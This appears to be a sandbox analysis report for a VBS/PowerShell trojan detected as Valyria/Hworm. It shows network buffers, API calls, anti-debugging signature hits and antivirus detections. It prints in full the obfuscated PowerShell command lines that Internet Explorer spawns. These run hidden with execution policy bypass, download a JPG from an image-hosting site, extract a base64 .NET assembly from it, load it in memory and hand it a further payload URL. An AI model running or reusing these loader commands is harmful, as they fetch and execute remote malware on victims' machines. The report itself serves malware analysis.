Data received ì‚ÉvÙÚÃTƒ*ps%»†ñ&W\§Œõ>Ϫ:Y•Ž—©ƒ^Q@Þ5WVæ¼rðÃk2tgÙÛ¯¶ÏK„”µ~(lœòÌ'# ïmÂô[iðKýAÓô&&“j1F÷êgckäcówZ€²¹Gfꓦ·Í×?yÀ|Õ9‡“æςGU‰¼Ni2k5&›÷1gÇʳãΤ2lðRÔjQÁ›…F„X"n &´F„.ûï‡)îa©rWéÕ~æ48÷·òÅOR>™³ªÙ’ËšÈs1Ð÷›ŽE)7oxDä›Hà’W/‘š×17,9Y{/-Õ}sI6?‡ [D†vñá9# ò×þ%Àâ[w1&=¢¯e4¿è™7 žÝÑM•VFbtçÁMà÷æ9EˆRM¡”ÐôkC0¯×iñ‰²¹Ÿ"UzÚøÞC7´NXš6;ÄÚøg‹ÃJ‘Odf¬èX˜xâOåRôt»cê*,n¥r'>™ÈàP `þ†(úg,—àbêGn[AßV>¹éÜèõŽßN$ ÇO¼EG*ñQ­‘úl³ï?¹ÔË«­^â--·bz2‚›MЯ™w‰–âÌÎRóѾ‹æïºa±™ý3fìŽÌØw<Y¾Éç­µÔ{˜[†ÕÖÈs ´N•¤§’r^e«2ÍÐ*dB³Q pœ^(ý¥ôž›{{Uã cZC­\}.Š[î'E Áèó·›nâæÈ/YaˆyxÕ.äqæ~ ÊЃ ¢?ÞÅbÓ_d,W0˜¹ê•cAtsë·~ÐíŞbɖ’0sÒ*õiéÃdÕF×ÆSÍïTä,Ðýè&ڝÁ* v%[‰5~8¿ØKXÐ4ÁË}°ááðûfZú'Ã"Âj^?nN`^œfp‰æsÁÝÑ-\€¼UUìçW?ùt guAO†Ä¼¡'öîÅ®'­cÍ°¾C>‹…²DqÖ3zú\wh¶Btþ/a÷9æe5äŒÔ¥ºŒ¢ÙwDþŸ·êš´Ò|uš;Zò;=©AÒá&™Ù}¶MÕ®3ös„°¿…f¤z„¶)ß¼8¦`!á÷wDŽ9.€vÓ6c<øíÒÅ)0ÝàŒRÊÒò,­t®b•ÀÌü’žopÔb’dº9C]ÎVÊË:ò,â3Á>æb–m8ýS,vƱŒ·o´àÃNÈX}ZÅŠ™‚Ä/"ðL´'ZÕ®ÐÌ»îÌÑ ‘ÊDYö?SŸôË|oýYÍk(‹©iž¢¾ðm¤!8{ƒ:ýW¶ùì˜ÿî = ȏ6eïé>:mÐ@Û. Õ= xäħ§E,g¦Ð#Ìàžö½„²Êõ£èx§ˆj@Bl‹Qó.Í7&¼H‰¯¦˜ÝŸGOD¸mé_ÜönÐGì[ûH¿·}X.ã¬X~ÿPÛóîæðÞØ{7/üå+ŽÕ=Ãzp;†½‰µ3×Ôd<Ãs-¾›]2ï9̟§îØût° o½B»xY_…ÖӀv,®,u»t3”^…Ò×¼LWé&™–v1uÃãq½”‚¿ææo7Ó½ªÕB8@æZÈiH¨Þ·“Zè곛QÚZ ŽÜ£+¢P=¹,Ô0՘]t˜<ز{ž÷VÓº¼?#|ßëOöêáPì¸ 'Yp«Rש¶ð.v Fu%?¢·æFÈþêGÇ؞ä/fÈÔ ¥¦…ì¾6NåO5Y+ّ+ÈèH’n¬¼»Œ`û"Æe; X¢="ãŒln€…BºtI3m¼h‰HÀûYz
Data received “¼ õސâ²ÉöÍ¾.Û©v)$Ä¡M%U#þÌ1Oå¾Ì¬ö3|S¼ã}øRãP—1ehm¹ˆä]êø!ÇD÷Ö 8,Ë-!Ÿ$å§a¦(^M0KtÝxE[µ&§]~.]½Ûó[Áç"Žˆ˜}0–šâ¥õ¿öºŒ(ºxxè ¿Û<°»˜ª´o~͈-°·ƒN<)“,·o¨cÏ'¦ûóƒØ)È[á å’~ܦËA;‘Æ¡aôNynT”÷tñ²’Ð3ýÛ|z£sߘ`0PöÄz'Z”xfVñhÐ譛Ÿ™÷(XðXÜö܌ˆ™_¼1²ŽŽ–Y¹¡Âw^óu|œYt“€™¦"ž“bÿm§2/Ä7¶ý¾þ¼ê¦ÙŸ?µýžé´uà&ـÌÇ%ÎÎ}?xú=fµÕ+œ…+"‹°‹ú¡]Ä=â< 0Æøå‰9Éoíö¡hø·iBº0ÎcÒ€âs }ÀÛ]-œ|Êr%Á1 “ªÆ>ꣿ÷ÚÄ{:}å6\Û1èìü}Îoõù˜JÈâÆý¥Ö2ýÒÕ®l“ŒAGVõœ¤ÆŠcL"‘E†oÑHmïygÝJŸG€•Ü¸ŽØAÁýÀ]À[݆ð=”cíd/±ù^aš)=¾[æám¯3RsEn§šF•¾ROM†k¯ ^ +±Ï/‚¡exÅÙèÔ ¹d‘¨æÜN£”ósÅNˆ!ۋ»b·->/‹Ð½ãá,i•þDVJ¥À‹6¬ìbmtI:ŒìͨÉ*¾[°‡ŠI{´j¹>}öHªK ^·8B’ Æ¬· ¬›Ï̯b‰y€v÷På}OÄê³ÇNIyRT;ÑÊæÓîXàجÊEP[¢^ùäÓÆmÂZ<‘ S»:؊FÉ $CíÎ9$’V÷ìž=ñÚýD{a§ Š±Ãö„×ø#Pv††!Ö§aC²9!w¡ÿØXd °RJè¿Â8žH!žÄö`(e¢q’kQ4þX Zš‘Õ|žÂ%Ž=yÂU†£×Ž•à?õ8–l9¼UÇëÔa90+‰½$×ùœ‚´ôË'å18<ù ߞÔ8YIØ{µA°Û¢Qh4ÿ¹ @¢éøÑ“c«Évk>…d<‰€Á5TŸboÄEAWo¤än+o¼&J_¥hQbÎC›øNUöÇ°~˄ Ÿ%=„›x¼Ìˎ›²YGÛvÌÍôb; @éƒ}èÙ7\isU7 5éU.@g)ûdAѶõÔl„š¡Ý:Î>Ì ŸËFQ¢à.HÚrä¨áA‰«Wâk¢ÜØÄ°ã)Í©O“érÏo½ˆñïê0ÝÚr¦ÐP*Sæ#IüUçòø<üƒèì,tVˆn‚Ë¨pi“Áè{à-+Czä"Œers7zÁÈíX?ÿË24 |<å˜ái:„ÿ{Òò·gê`3Åïœxp¥q-ãù¢§ï¦0JÔ OîYÀà åǟy"q×·NžÞªþçA© îÚWÅärayJÿ‚_&òôßœ(±§sñHˆÔ‰³`Ôsé÷“½©Îæ)c96Tí"L QÔx`%š_ÚwÇEŒêQ$)´¦Ãùxí,)ÊoHÌ75žñࢉ¤³…ïkCÃþÀ¹ë"{¤_%EGéƒëîÊßIákdØ*³&ïÎfÎ+Mæ8:†o˜Jµq©Øàs‰K¯2…0ió|  >¾z»OF#‡êžR·‚jMQƒTàþ•ÚƒÄË=eó¦ëg‚Ÿ.
Data received #B‰ØÏÑ1R㘎mk€C¯+4ƄŽG¦àÉÚíh~,ªÉÒb*™”â.zÏx-3S7YC¤ö»ÜfdäʐaÙo ¤æFDZVðH´y~NÞ^òº.=¯Ú"±zêÇA•¬Å4‹-®Vt†ùi#Ñ]”W€ö_‹ðÿLû0/`©Hóê­íÎkæ‰È0µÓ£¬p|4‹4z‹„”)Êæ$JžË€5£’U©Îdï #Æa…>éVq{*vgµ?Ã?tCt±AxÞ°@ØàO¯=Rbs ˜” » U2X¦G?{ïñJ2±ËʼnMí¼ÅZ´Ú]ÆDF<‹â»(1:îz.óªa"ióa…c´ìÚ¾…ØγK]abøñú3®ôÄÿ€¿r |v–Yi¨0BnЫքÀHÅ<´;²‹ü$F¹ê0•¹ÃÈeâ<Þ蒞/,þCñÚëa_87ú~»÷ù9Žep©ûKD ÿ;ñ ÒMÄÙlIo¢à2ä[,x¡êíú ŸG^÷Mnn¬»Qè„^8‡™v•ˆ ™” ·‹iSò©/ŸÇ=AøKù[$½ÖõØ7"êd¹±ü—½%½ì?t³åOV²c¼Ù&rj‹Ü1¥ƒÎ,㈃$ÔÀáMÈ>µ4ãSá»$¢zB͸wsõ¨Lð´ÖØô‰¾Þ«÷……º=ú2ށZA)Ÿ¿³ƍ+RÍÃkcÍîÚòõ3íŽ7ˆùțN4E7%„¾×¿$ɏ<g) ÙóªV`”¨e+·ÊŽ¶Q➸ÍÜáó௰õa§»¨­zÈ"Ró¸P½®Vkõh÷ñ4¯ê D .Eù®RŸ‡êkâ„ûa’ø/EV¨å¶%Ÿ,Lč™ì›×ÊΔn[l)ìͲo¼þ=|T%šF®ä={ G¦µÕ<þ¨m鹛haT0Ø©mô/U/eT¶ s€Õn`W…/õ¢@l5ûäôB rvqT—7ªW™äs%ò·G%Ûz¦X>æéUœª…¢lìã¸q6r®ô.I“zH=dî¥Ò‡ŒkÐäBw6™j#ùÒùî… ˜Œ¹Æ_ÆߐñÂ7rf¶ÇmѪiÁㆈ¹w°ïy[ oE¶º'$t–|3Ìmþ-€4–ŒÐÇÜ»ÑÕÞb]›S>ê <­ä•Z]e¸sžç{#®—ÇÔ›× \PKáˁ"ÛeÖ˜#U§søû@ᆮ+/©+ê"zÌ"Úاt~nÕø›—žù⣹yF¥ו1ªƒ¤¢ Ë9æ!ÿʃh:&µR6 ¾±ŠXÝ&`ËL—™³ê¸bþå6pÌ  +ˆéƒàr²•e՟ÜYíÏFúßH]1)¿›É ^¯üxƒF×®fÅòS' 4{ø ®µ@"Óºÿ[«æÊ1î³\ÐkaâÅ};®r@A4ï;Vþ:Eg&€×<U”pIGèz|ÀÓ`ÿQꈻ醼‡ÏœèüåÊ3 ޓKkSx|v±ikê´‹ãµBdדÔ{„=­ ·ô&ÀÓz-k†/hc˜ŠQà>¼ @ú"5 '@ºr¥”5¼´´ӟüõR™%6Àbæ؋›¹®ø­+̏òqIJZ¨¯§:ⶇ|¼Z·pxÅfå¸ÿ¢scûaî‹1܄x>ª˜q+ÛþbAzñžH¦å®jV#‘ð£5X“ŒEwvÃb ŽÉf}¥Áµ’Gvg‹²{A­,·#ÅTZ˜ëŽ~k6ƒ¬”È“ÜM'Ü1έ3m<[ãù‚*l°“Ÿ
Data sent qme@¾‹Gœ_PJ] ”ÖžÀÊPÉ<ø|ûe"·Bþ7/5 ÀÀÀ À 28,ÿimageupload.io  
Data sent FBA°üÓùpåÈvnVæ;¹ u%@ÀOÒø»À C×ì VÒ¬LÚ؂»)hßRîÎP/öå=–ò…Ï"07/}wÝ8a²&ìõ7¯†¬ãY@åF+Úþ7¨pº!"pµ¬2Ð=Ö·Lê½£^Þî
Data sent €ìcLjCˆÖÛ¦¶kìO_#Ý"_¡zoÑ oœ ¦¯‹¸Æ¿ûӔÜ1’¹û”L0ÀHcë7k^ìM°©s Ÿôí1#”9çK;•1Žu"=Õ¬R’­w|‰ ß`ð‹l4¹DFÔD0Y–Ï!¨Ì9ZØqÚP«qëjäâ
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3068 CREDAT:145409
host 117.18.232.200
MicroWorld-eScan VB:Trojan.Valyria.8400
ALYac VB:Trojan.Valyria.8400
VIPRE VB:Trojan.Valyria.8400
Symantec Scr.Malscript!gen11
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.Valyria.8400
NANO-Antivirus Trojan.Script.Hworm.dmiour
FireEye VB:Trojan.Valyria.8400
Emsisoft VB:Trojan.Valyria.8400 (B)
GData VB:Trojan.Valyria.8400
Google Detected
MAX malware (ai score=85)
Arcabit VB:Trojan.Valyria.D20D0
Rising Trojan.Agent/VBS!1.EAE0 (CLASSIC)
Ikarus Trojan.VBS.Agent
AVG Other:Malware-gen [Trj]
parent_process iexplore.exe martian_process powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
Time & API Arguments Status Return Repeated

send

buffer: qme@¾‹Gœ_PJ] ”ÖžÀÊPÉ<ø|ûe"·Bþ7/5 ÀÀÀ À 28,ÿimageupload.io  
socket: 1280
sent: 118
1 118 0

send

buffer: FBA°üÓùpåÈvnVæ;¹ u%@ÀOÒø»À C×ì VÒ¬LÚ؂»)hßRîÎP/öå=–ò…Ï"07/}wÝ8a²&ìõ7¯†¬ãY@åF+Úþ7¨pº!"pµ¬2Ð=Ö·Lê½£^Þî
socket: 1280
sent: 134
1 134 0

send

buffer: €ìcLjCˆÖÛ¦¶kìO_#Ý"_¡zoÑ oœ ¦¯‹¸Æ¿ûӔÜ1’¹û”L0ÀHcë7k^ìM°©s Ÿôí1#”9çK;•1Žu"=Õ¬R’­w|‰ ß`ð‹l4¹DFÔD0Y–Ï!¨Ì9ZØqÚP«qëjäâ
socket: 1280
sent: 133
1 133 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process iexplore.exe martian_process powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V